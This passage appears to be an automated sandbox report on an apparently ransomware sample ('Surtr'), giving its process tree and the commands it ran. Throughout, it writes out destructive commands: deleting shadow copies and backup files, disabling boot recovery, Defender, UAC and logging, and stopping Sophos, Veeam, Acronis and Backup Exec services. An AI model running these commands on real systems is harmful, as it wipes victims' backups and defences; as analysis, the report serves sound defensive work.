PID 4696 wrote to memory of 772	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	105
PID 4696 wrote to memory of 772	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	105
PID 4696 wrote to memory of 1084	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	106
PID 4696 wrote to memory of 1084	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	106
PID 2152 wrote to memory of 2336	2152	cmd.exe	107
PID 2152 wrote to memory of 2336	2152	cmd.exe	107
PID 1084 wrote to memory of 3224	1084	cmd.exe	108
PID 1084 wrote to memory of 3224	1084	cmd.exe	108
PID 4696 wrote to memory of 3572	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	109
PID 4696 wrote to memory of 3572	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	109
PID 3224 wrote to memory of 3792	3224	net.exe	110
PID 3224 wrote to memory of 3792	3224	net.exe	110
PID 3572 wrote to memory of 2936	3572	cmd.exe	111
PID 3572 wrote to memory of 2936	3572	cmd.exe	111
PID 4696 wrote to memory of 4120	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	112
PID 4696 wrote to memory of 4120	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	112
PID 4696 wrote to memory of 4392	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	113
PID 4696 wrote to memory of 4392	4696	459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe	113
PID 4120 wrote to memory of 2756	4120	cmd.exe	114
PID 4120 wrote to memory of 2756	4120	cmd.exe	114

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3012	attrib.exe
3320	attrib.exe

C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
"C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c @echo off
  2⤵
  PID:1320
- - C:\Windows\system32\net.exe
    net stop "SNAC"
    3⤵
    PID:3096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SNAC"
      4⤵
      PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4760
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1172
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\system32\net.exe
    net stop "Acronis VSS Provider"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider"
      4⤵
      PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:520
- - C:\Windows\system32\net.exe
    net stop " Enterprise Client Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop " Enterprise Client Service"
      4⤵
      PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1332
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2292
- - C:\Windows\system32\net.exe
    net stop "Sophos Agent"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Agent"
      4⤵
      PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*
  2⤵
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1084
- - C:\Windows\system32\net.exe
    net stop "Sophos AutoUpdate Service"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
      4⤵
      PID:3792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3572
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4120
- - C:\Windows\system32\net.exe
    net stop "Sophos Clean Service"
    3⤵
    PID:2756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Clean Service"
      4⤵
      PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4392
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3676
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
  2⤵
  PID:3152
- - C:\Windows\system32\net.exe
    net stop "Sophos Device Control Service"
    3⤵
    PID:1168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Device Control Service"
      4⤵
      PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:4176
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
  2⤵
  PID:4904
- - C:\Windows\system32\net.exe
    net stop "Sophos File Scanner Service"
    3⤵
    PID:1960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos File Scanner Service"
      4⤵
      PID:1952
    - - C:\Windows\system32\net.exe
        
        net stop "MSExchangeMTA"
        5⤵
        
        PID:4124
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSExchangeMTA"
        6⤵
        
        PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
  2⤵
  PID:1520
- - C:\Windows\system32\net.exe
    net stop "Sophos Health Service"
    3⤵
    PID:2376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Health Service"
      4⤵
      PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:2676
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
  2⤵
  PID:3216
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Agent"
    3⤵
    PID:504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Agent"
      4⤵
      PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
  2⤵
  PID:1556
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Client"
    3⤵
    PID:360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Client"
      4⤵
      PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:760
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
      4⤵
      PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:3076
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
  2⤵
  PID:2540
- - C:\Windows\system32\net.exe
    net stop "Sophos Message Router"
    3⤵
    PID:4064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Message Router"
      4⤵
      PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4452
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
  2⤵
  PID:4772
- - C:\Windows\system32\net.exe
    net stop "Sophos Safestore Service"
    3⤵
    PID:4060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Safestore Service"
      4⤵
      PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1484
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:3320
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
  2⤵
  PID:2428
- - C:\Windows\system32\net.exe
    net stop "Sophos System Protection Service"
    3⤵
    PID:1964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos System Protection Service"
      4⤵
      PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:3600
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:4252
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
  2⤵
  PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
  2⤵
  PID:4704
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Backup Service"
    3⤵
    PID:1844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service"
      4⤵
      PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:3592
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:4048
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
  2⤵
  PID:2480
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Filter Service"
    3⤵
    PID:2304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service"
      4⤵
      PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:276
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
  2⤵
  PID:992
- - C:\Windows\system32\net.exe
    net stop "Symantec System Recovery"
    3⤵
    PID:204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Symantec System Recovery"
      4⤵
      PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1688
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4352
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
  2⤵
  PID:108
- - C:\Windows\system32\net.exe
    net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3508
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:4416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:3988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
  2⤵
  PID:4136
- - C:\Windows\system32\net.exe
    net stop "AcronisAgent"
    3⤵
    PID:2868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcronisAgent"
      4⤵
      PID:3756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:3988
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
  2⤵
  PID:2116
- - C:\Windows\system32\net.exe
    net stop "AcrSch2Svc"
    3⤵
    PID:2336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcrSch2Svc"
      4⤵
      PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:4460
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:2152
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Antivirus"
  2⤵
  PID:3224
- - C:\Windows\system32\net.exe
    net stop "Antivirus"
    3⤵
    PID:2488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Antivirus"
      4⤵
      PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:836
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:4160
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
  2⤵
  PID:2032
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentAccelerator"
    3⤵
    PID:2756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
      4⤵
      PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:3784
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
  2⤵
  PID:2560
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentBrowser"
    3⤵
    PID:4080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
      4⤵
      PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
  2⤵
  PID:2892
- - C:\Windows\system32\net.exe
    net stop "BackupExecDeviceMediaService"
    3⤵
    PID:4076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
      4⤵
      PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
  2⤵
  PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
  2⤵
  PID:4336
- - C:\Windows\system32\net.exe
    net stop "BackupExecJobEngine"
    3⤵
    PID:5032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecJobEngine"
      4⤵
      PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  - Drops startup file
  PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
  2⤵
  PID:1792
- - C:\Windows\system32\net.exe
    net stop "BackupExecManagementService"
    3⤵
    PID:2344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecManagementService"
      4⤵
      PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
  2⤵
  PID:3604
- - C:\Windows\system32\net.exe
    net stop "BackupExecRPCService"
    3⤵
    PID:3204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecRPCService"
      4⤵
      PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
  2⤵
  PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
  2⤵
  PID:440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
  2⤵
  PID:1456
- - C:\Windows\system32\net.exe
    net stop "BackupExecVSSProvider"
    3⤵
    PID:4840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecVSSProvider"
      4⤵
      PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
  2⤵
  PID:760
- - C:\Windows\system32\net.exe
    net stop "EPSecurityService"
    3⤵
    PID:2260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EPSecurityService"
      4⤵
      PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:3372
- C:\Windows\system32\cmd.exe
